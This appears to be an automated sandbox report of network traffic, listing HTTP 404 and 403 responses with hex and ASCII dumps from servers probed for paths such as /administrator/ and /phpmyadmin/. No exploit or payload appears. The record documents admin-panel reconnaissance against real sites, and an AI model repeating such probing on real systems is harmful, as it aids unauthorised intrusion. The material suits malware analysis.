Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sun, 26 Nov 2023 05:55:03 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:32 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16Content-Length: 221Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /administrator/index.php was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Sun, 26 Nov 2023 05:59:32 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 26 Nov 2023 05:59:32 GMTServer: ApacheContent-Length: 262Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 70 20 61 6c 69 67 6e 3d 27 63 65 6e 74 65 72 27 3e 26 6e 62 73 70 3b 3c 2f 70 3e 3c 70 20 61 6c 69 67 6e 3d 27 63 65 6e 74 65 72 27 3e 26 6e 62 73 70 3b 3c 2f 70 3e 3c 70 20 61 6c 69 67 6e 3d 27 63 65 6e 74 65 72 27 3e 26 6e 62 73 70 3b 3c 2f 70 3e 3c 70 20 61 6c 69 67 6e 3d 27 63 65 6e 74 65 72 27 3e 26 6e 62 73 70 3b 3c 2f 70 3e 3c 70 20 61 6c 69 67 6e 3d 27 63 65 6e 74 65 72 27 3e 3c 62 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 27 41 72 69 61 6c 27 20 73 69 7a 65 3d 27 33 27 3e 45 72 72 6f 20 34 30 33 3c 2f 66 6f 6e 74 3e 3c 2f 62 3e 3c 2f 70 3e 3c 70 20 61 6c 69 67 6e 3d 27 63 65 6e 74 65 72 27 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 27 4d 53 20 53 61 6e 73 20 53 65 72 69 66 27 20 73 69 7a 65 3d 27 32 27 3e 41 63 65 73 73 6f 20 6e 65 67 61 64 6f 3c 2f 66 6f 6e 74 3e 3c 2f 70 3e Data Ascii: <p align='center'>&nbsp;</p><p align='center'>&nbsp;</p><p align='center'>&nbsp;</p><p align='center'>&nbsp;</p><p align='center'><b><font face='Arial' size='3'>Erro 403</font></b></p><p align='center'><font face='MS Sans Serif' size='2'>Acesso negado</font></p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:32 GMTServer: ApacheContent-Length: 212Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /administrator/ was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:32 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 184Content-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e cd 0e 82 30 10 84 ef 3c c5 ca 1d 16 0d c7 a6 07 f9 89 24 88 c4 94 83 47 4c ab 25 c1 b6 42 91 f8 f6 52 b8 78 9c 9d f9 66 96 ec d2 4b c2 6e 75 06 27 76 2e a1 6e 8e 65 91 80 1f 20 16 19 cb 11 53 96 6e ce 21 8c 10 b3 ca a7 1e 91 f6 d5 53 22 45 cb 17 61 3b db 0b 1a 47 31 54 da 42 ae 27 c5 09 6e 47 8f e0 1a 22 77 cd bf 8e db d3 bf cc a2 3c 62 28 93 02 06 f1 9e c4 68 05 87 e6 5a 02 ce 26 e8 f5 b3 53 a1 91 06 e6 76 04 b5 50 0f 47 81 56 60 65 37 c2 28 86 8f 18 42 82 c6 ad ac fd 4b a3 fb cb fb 01 96 3d a0 d1 d2 00 00 00 Data Ascii: M0<$GL%BRxfKnu'v.ne Sn!S"Ea;G1TB'nG"w<b(hZ&SvPGV`e7(BK=
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sun, 26 Nov 2023 05:59:32 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveKeep-Alive: timeout=20Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sun, 26 Nov 2023 05:55:03 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:32 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sun, 26 Nov 2023 05:55:03 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:32 GMTServer: ApacheLast-Modified: Thu, 24 Oct 2019 19:33:13 GMTETag: "1e8-595ad1aad5040"Accept-Ranges: bytesContent-Length: 488Content-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 74 2d 62 72 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 50 e1 67 69 6e 61 20 4e e3 6f 20 45 6e 63 6f 6e 74 72 61 64 61 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 62 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 41 72 69 61 6c 22 20 73 69 7a 65 3d 22 33 22 3e 45 72 72 6f 20 34 30 34 3c 2f 66 6f 6e 74 3e 3c 2f 62 3e 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 4d 53 20 53 61 6e 73 20 53 65 72 69 66 22 20 73 69 7a 65 3d 22 32 22 3e 50 e1 67 69 6e 61 20 6e e3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 3c 2f 66 6f 6e 74 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Language" content="pt-br"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Pgina No Encontrada</title></head><body><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><b><font face="Arial" size="3">Erro 404</font></b></p><p align="center"><font face="MS Sans Serif" size="2">Pgina no encontrada</font></p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:31 GMTServer: ApacheX-Powered-By: PHP/8.0.20Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://gccb.co.in/wp-json/>; rel="https://api.w.org/"Vary: User-AgentTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 30 32 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 54 68 65 20 47 6f 64 68 72 61 20 43 69 74 79 20 43 6f 2d 6f 70 20 42 61 6e 6b 20 4c 74 64 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 2f 2f 73 2e 77 2e 6f 72 67 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 54 68 65 20 47 6f 64 68 72 61 20 43 69 74 79 20 43 6f 2d 6f 70 20 42 61 6e 6b 20 4c 74 64 2e 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 63 63 62 2e 63 6f 2e 69 6e 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 54 68 65 20 47 6f 64 68 72 61 20 43 69 74 79 20 43 6f 2d 6f 70 20 42 61 6e 6b 20 4c 74 64 2e 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 63 63 62 2e 63 6f 2e 69 6e 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:32 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16Content-Length: 209Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /phpmyadmin/ was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:32 GMTServer: Apache/2.4.57 (Unix)Content-Length: 196Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
